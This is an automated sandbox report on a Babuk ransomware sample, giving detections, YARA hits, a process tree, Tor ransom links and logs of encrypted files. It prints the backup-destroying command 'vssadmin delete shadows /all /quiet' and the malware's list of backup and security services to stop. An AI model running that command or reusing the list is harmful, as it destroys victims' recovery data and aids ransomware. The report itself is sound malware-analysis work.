Analysis Report babuk_v5

Overview

General Information

Sample Name: babuk_v5 (renamed file extension from none to exe)
Analysis ID: 347507
MD5: 67e49cfcd12103b5ef2f9f331f092dbe
SHA1: 72cad5a81ce546b42844b5b8fc2ab55e99f2b5d4
SHA256: 58ccba4fb2b3ed8b5f92adddd6ee331a6afdedfc755145e0432a7cb324c28053

Detection

Babuk
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Babuk Ransomware
Deletes shadow drive data (may be related to ransomware)
Found Tor onion address
Machine Learning detection for sample
May disable shadow drive data (uses vssadmin)
Modifies existing user documents (likely ransomware behavior)
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • babuk_v5.exe (PID: 4984 cmdline: 'C:\Users\user\Desktop\babuk_v5.exe' MD5: 67E49CFCD12103B5EF2F9F331F092DBE)
    • cmd.exe (PID: 4712 cmdline: 'C:\Windows\System32\cmd.exe' /c vssadmin.exe delete shadows /all /quiet MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • vssadmin.exe (PID: 6528 cmdline: vssadmin.exe delete shadows /all /quiet MD5: 47D51216EF45075B5F7EAA117CC70E40)
  • SearchUI.exe (PID: 6328 cmdline: 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca MD5: C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2)
  • notepad.exe (PID: 4656 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Restore Your Files.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| babuk_v5.exe | Destructive_Ransomware_Gen1 | Detects destructive malware | Florian Roth | 0xad0:$x2: delete shadows /all /quiet |
| babuk_v5.exe | JoeSecurity_babuk | Yara detected Babuk Ransomware | Joe Security | |

Memory Dumps

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000001.00000000.335583534.0000000000BF1000.00000020.00020000.sdmp | JoeSecurity_babuk | Yara detected Babuk Ransomware | Joe Security | |
| 00000001.00000003.420310947.0000000000E86000.00000004.00000001.sdmp | JoeSecurity_babuk | Yara detected Babuk Ransomware | Joe Security | |
| 00000001.00000003.421468331.0000000000E86000.00000004.00000001.sdmp | JoeSecurity_babuk | Yara detected Babuk Ransomware | Joe Security | |
| 00000001.00000003.412867169.0000000000E86000.00000004.00000001.sdmp | JoeSecurity_babuk | Yara detected Babuk Ransomware | Joe Security | |
| 00000001.00000003.411482740.0000000000E86000.00000004.00000001.sdmp | JoeSecurity_babuk | Yara detected Babuk Ransomware | Joe Security | |
Unpacked PEs

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 1.0.babuk_v5.exe.bf0000.0.unpack | Destructive_Ransomware_Gen1 | Detects destructive malware | Florian Roth | 0xad0:$x2: delete shadows /all /quiet |
| 1.0.babuk_v5.exe.bf0000.0.unpack | JoeSecurity_babuk | Yara detected Babuk Ransomware | Joe Security | |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://temp.sh/fVAxj/1.png Avira URL Cloud: Label: malware
Source: https://temp.sh/qpkLy/3.png Avira URL Cloud: Label: malware
Source: https://temp.sh/KAXUW/8.png Avira URL Cloud: Label: malware
Source: https://temp.sh/hPkTt/4.png Avira URL Cloud: Label: malware
Source: https://temp.sh/YzAJd/6.png Avira URL Cloud: Label: malware
Source: https://temp.sh/ENvac/5.png Avira URL Cloud: Label: malware
Source: https://temp.sh/VZRcj/2.png Avira URL Cloud: Label: malware
Source: https://temp.sh/eBGdx/7.png Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: babuk_v5.exe Virustotal: Detection: 77%
Source: babuk_v5.exe Metadefender: Detection: 51%
Source: babuk_v5.exe ReversingLabs: Detection: 89%
Machine Learning detection for sample
Source: babuk_v5.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: babuk_v5.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: babuk_v5.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols

Networking:

Found Tor onion address
Source: babuk_v5.exe, 00000001.00000000.335583534.0000000000BF1000.00000020.00020000.sdmp String found in binary or memory: 3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ
Source: babuk_v5.exe, 00000001.00000000.335583534.0000000000BF1000.00000020.00020000.sdmp String found in binary or memory: http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm
Source: notepad.exe, 0000001B.00000002.675260160.000001F983981000.00000004.00000020.sdmp String found in binary or memory: 3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ
Source: notepad.exe, 0000001B.00000002.675260160.000001F983981000.00000004.00000020.sdmp String found in binary or memory: http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm
Source: babuk_v5.exe String found in binary or memory: 3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ
Source: babuk_v5.exe String found in binary or memory: http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Documents and Settings\Default\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\How To Restore Your Files.txtJump to behavior
Source: unknown DNS traffic detected: queries for: cdn.onenote.net

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Babuk Ransomware
Source: Yara match File source: babuk_v5.exe, type: SAMPLE
                Source: Yara matchFile source: Process Memory Space: babuk_v5.exe PID: 4984, type: MEMORY
                Source: Yara matchFile source: 1.0.babuk_v5.exe.bf0000.0.unpack, type: UNPACKEDPE
                Deletes shadow drive data (may be related to ransomware)Show sources
                Source: unknownProcess created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quiet
                Source: babuk_v5.exe, 00000001.00000000.335583534.0000000000BF1000.00000020.00020000.sdmpBinary or memory string: vsssqlsvc$memtasmepocssophosveeambackupGxVssGxBlrGxFWDGxCVDGxCIMgrDefWatchccEvtMgrccSetMgrSavRoamRTVscanQBFCServiceQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServiceYooBackupYooITzhudongfangyusophosstc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcveeamPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobuserBackupExecManagementServiceBackupExecRPCServiceAcrSch2SvcAcronisAgentCASAD2DWebSvcCAARCUpdateSvcsql.exeoracle.exeocssd.exedbsnmp.exesynctime.exeagntsvc.exeisqlplussvc.exexfssvccon.exemydesktopservice.exeocautoupds.exeencsvc.exefirefox.exetbirdconfig.exemydesktopqos.exeocomm.exedbeng50.exesqbcoreservice.exeexcel.exeinfopath.exemsaccess.exemspub.exeonenote.exeoutlook.exepowerpnt.exesteam.exethebat.exethunderbird.exevisio.exewinword.exewordpad.exenotepad.exeQ:\W:\E:\R:\T:\Y:\U:\I:\O:\P:\A:\S:\D:\F:\G:\H:\J:\K:\L:\Z:\X:\C:\V:\B:\N:\M:\IsWow64Processkernel32.dllkernel32.dllWow64DisableWow64FsRedirection/c vssadmin.exe delete shadows /all /quietcmd.exeopenkernel32.dllWow64RevertWow64FsRedirectionadvapi32.dllSystemFunction036%lu, Error Code: ->
                Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quiet
                Source: vssadmin.exe, 00000005.00000002.352351073.0000017C5E3F0000.00000004.00000020.sdmp; Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quietvssadmin.exe delete shadows /all /quietWinsta0\Default
                Source: vssadmin.exe, 00000005.00000002.352351073.0000017C5E3F0000.00000004.00000020.sdmp; Binary or memory string: vssadmin.exe delete shadows /all /quiet
                Source: vssadmin.exe, 00000005.00000002.352931999.0000017C5E745000.00000004.00000040.sdmp; Binary or memory string: vssadmin.exedeleteshadows/all/quietn
                Source: vssadmin.exe, 00000005.00000002.352312680.0000017C5E3A0000.00000002.00000001.sdmp; Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
                Source: vssadmin.exe, 00000005.00000002.352312680.0000017C5E3A0000.00000002.00000001.sdmp; Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
                Source: vssadmin.exe, 00000005.00000002.352312680.0000017C5E3A0000.00000002.00000001.sdmp; Binary or memory string: vssadmin Delete Shadows
                Source: vssadmin.exe, 00000005.00000002.352312680.0000017C5E3A0000.00000002.00000001.sdmp; Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
                Source: vssadmin.exe, 00000005.00000002.352312680.0000017C5E3A0000.00000002.00000001.sdmp; Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
                May disable shadow drive data (uses vssadmin)
                Source: unknown; Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quiet
                Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quiet
                Modifies existing user documents (likely ransomware behavior)
                Source: C:\Users\user\Desktop\babuk_v5.exe; File moved: C:\Users\user\Desktop\NIKHQAIQAU\FENIVHOIKN.xlsx
                Source: C:\Users\user\Desktop\babuk_v5.exe; File moved: C:\Users\user\Desktop\NIKHQAIQAU\ZQIXMVQGAH.mp3
                Source: C:\Users\user\Desktop\babuk_v5.exe; File moved: C:\Users\user\Desktop\JSDNGYCOWY\JSDNGYCOWY.docx
                Source: C:\Users\user\Desktop\babuk_v5.exe; File moved: C:\Users\user\Desktop\JSDNGYCOWY\NIKHQAIQAU.xlsx
                Source: C:\Users\user\Desktop\babuk_v5.exe; File moved: C:\Users\user\Desktop\FENIVHOIKN.xlsx
                Writes many files with high entropy
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\Default\NTUSER.DAT.LOG1.babyk entropy: 7.99653066477Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TM.blf.babyk entropy: 7.99708321212Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms.babyk entropy: 7.99962827284Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms.babyk entropy: 7.99967384143Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei.babyk entropy: 7.99229271013Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin.babyk entropy: 7.9946841253Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst.babyk entropy: 7.9973645994Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat.babyk entropy: 7.99925167333Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.babyk entropy: 7.99981535924Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx.babyk entropy: 7.99982426926Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs.babyk entropy: 7.99984083734Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Downloader_2020-07-23_174109_5608-5612.log.babyk entropy: 7.99457080703Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_195423_6516-6324.log.babyk entropy: 7.99500252504Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_125251_1844-1848.log.babyk entropy: 7.99785895861Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Downloader_2020-07-27_144632_3336-1696.log.babyk entropy: 7.99322322331Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2019-06-27_195437_6860-6784.log.babyk entropy: 7.9987295452Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-07-27_074908_1728-1718.log.babyk entropy: 7.99806658207Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-07-27_074908_16c0-4d4.log.babyk entropy: 7.99857374141Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-08-26_080227_145c-17a4.log.babyk entropy: 7.99807765518Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-09-30_082319_c94-ff4.log.babyk entropy: 7.99787603583Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-08-26_080227_17fc-17f8.log.babyk entropy: 7.9980869788Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2019-06-27_125252_1864-1868.log.babyk entropy: 7.99970326298Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-09-30_082319_1314-414.log.babyk entropy: 7.99772050097Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-07-27_074907_15c-410.log.babyk entropy: 7.99797371449Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-08-26_080226_b58-b68.log.babyk entropy: 7.99813612471Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2019-06-27_195441_60-6252.log.babyk entropy: 7.99083082248Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-09-30_082318_17d4-1694.log.babyk entropy: 7.9980879862Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc.session.babyk entropy: 7.99116075548Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.babyk entropy: 7.99714687529Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.babyk entropy: 7.99847305961Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.babyk entropy: 7.9986665378Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001.babyk entropy: 7.99729873128Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001.babyk entropy: 7.99724969049Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.babyk entropy: 7.99714719164Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl.babyk entropy: 7.99270359539Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.babyk entropy: 7.9998109263Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log.babyk entropy: 7.99961095278Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edbres00001.jrs.babyk entropy: 7.99962903467Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edbres00002.jrs.babyk entropy: 7.99962960114Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edbtmp.log.babyk entropy: 7.99967363847Jump to dropped file

                System Summary:

                Malicious sample detected (through community Yara rule)
                Source: babuk_v5.exe, type: SAMPLE; Matched rule: Detects destructive malware, Author: Florian Roth
                Source: 1.0.babuk_v5.exe.bf0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects destructive malware, Author: Florian Roth
                Source: babuk_v5.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: babuk_v5.exe, type: SAMPLE; Matched rule: Destructive_Ransomware_Gen1 date = 2018-02-12, hash1 = ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85, author = Florian Roth, description = Detects destructive malware, reference = http://blog.talosintelligence.com/2018/02/olympic-destroyer.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.0.babuk_v5.exe.bf0000.0.unpack, type: UNPACKEDPE; Matched rule: Destructive_Ransomware_Gen1 date = 2018-02-12, hash1 = ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85, author = Florian Roth, description = Detects destructive malware, reference = http://blog.talosintelligence.com/2018/02/olympic-destroyer.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: classification engine; Classification label: mal96.rans.evad.winEXE@8/1115@1/0
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; File created: C:\Users\user\AppData\Local\Packages\microsoft.windows.cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\_ae0cB8fPDMkfSJUO5xUuczSt7E[1].css
                Source: C:\Users\user\Desktop\babuk_v5.exe; Mutant created: \Sessions\1\BaseNamedObjects\DoYouWantToHaveSexWithCoungDong
                Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_01
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Documents and Settings\Default\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\How To Restore Your Files.txtJump to behavior
                Source: babuk_v5.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\babuk_v5.exe; File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\babuk_v5.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; File read: C:\Windows\System32\drivers\etc\hosts
                Source: babuk_v5.exe; Virustotal: Detection: 77%
                Source: babuk_v5.exe; Metadefender: Detection: 51%
                Source: babuk_v5.exe; ReversingLabs: Detection: 89%
                Source: unknown; Process created: C:\Users\user\Desktop\babuk_v5.exe 'C:\Users\user\Desktop\babuk_v5.exe'
                Source: unknown; Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c vssadmin.exe delete shadows /all /quiet
                Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown; Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quiet
                Source: unknown; Process created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                Source: unknown; Process created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Restore Your Files.txt
                Source: C:\Users\user\Desktop\babuk_v5.exe; Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c vssadmin.exe delete shadows /all /quiet
                Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quiet
                Source: C:\Users\user\Desktop\babuk_v5.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; File opened: C:\Windows\SYSTEM32\msftedit.dll
                Source: Window Recorder; Window detected: More than 3 window changes detected
                Source: babuk_v5.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: babuk_v5.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; Code function: 17_2_000001B143244C20 pushad ; ret 17_2_000001B143244CC2
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; Code function: 17_2_000001B143244901 pushad ; ret 17_2_000001B143244902
                Source: C:\Users\user\Desktop\babuk_v5.exe; File created: C:\Documents and Settings\Default\Start Menu\How To Restore Your Files.txt
                Source: C:\Users\user\Desktop\babuk_v5.exe; File created: C:\Documents and Settings\Default\Start Menu\Programs\How To Restore Your Files.txt
                Source: C:\Users\user\Desktop\babuk_v5.exe; File created: C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\How To Restore Your Files.txt
                Source: C:\Users\user\Desktop\babuk_v5.exe; File created: C:\Documents and Settings\Default\Start Menu\Programs\Accessories\How To Restore Your Files.txt
                Source: C:\Users\user\Desktop\babuk_v5.exe; File created: C:\Documents and Settings\Default\Start Menu\Programs\Maintenance\How To Restore Your Files.txt
                Source: C:\Users\user\Desktop\babuk_v5.exe; File created: C:\Documents and Settings\Default\Start Menu\Programs\System Tools\How To Restore Your Files.txt
                Source: C:\Users\user\Desktop\babuk_v5.exe; File created: C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\How To Restore Your Files.txt
                Source: C:\Users\user\Desktop\babuk_v5.exe; Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\babuk_v5.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; Memory allocated: 1B140380000 memory reserve | memory write watch
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; Memory allocated: 1B1404D0000 memory reserve | memory write watch
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; Memory allocated: 1B1405D0000 memory reserve | memory write watch
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; Memory allocated: 1B140A90000 memory reserve | memory write watch
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; Memory allocated: 1B142000000 memory reserve | memory write watch
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; Memory allocated: 1B142620000 memory reserve | memory write watch
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; Memory allocated: 1B142720000 memory commit | memory reserve | memory write watch
                Source: C:\Users\user\Desktop\babuk_v5.exe; File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\05_Pictures_taken_in_the_last_month.wpl.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D.babykJump to behavior
